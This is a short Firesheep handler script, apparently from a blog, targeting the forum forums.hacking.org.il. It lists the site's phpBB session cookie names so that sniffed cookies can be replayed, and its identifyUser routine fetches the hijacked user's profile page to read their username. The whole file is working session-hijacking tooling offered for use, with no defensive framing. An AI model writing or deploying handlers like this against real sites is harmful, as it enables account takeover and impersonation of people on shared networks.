// Author
// cityZombie <chebon9@gmail.com>
// For more handlers visit : http://firesheepfan.blogspot.com/
register({
name: "Forums.Hacking.org.il",
domains: [ 'forums.hacking.org.il' ],
sessionCookieNames: [ 'phpbbheb_data','phpbbheb_sid','phpbbheb_t' ],
identifyUser: function () {
var req = this.siteUrl + "/profile.php?mode=editprofile";
var resp = this.httpGet(req);
this.userName = resp.body.querySelector("input[name='username']").value;
}
});
No comments:
Post a Comment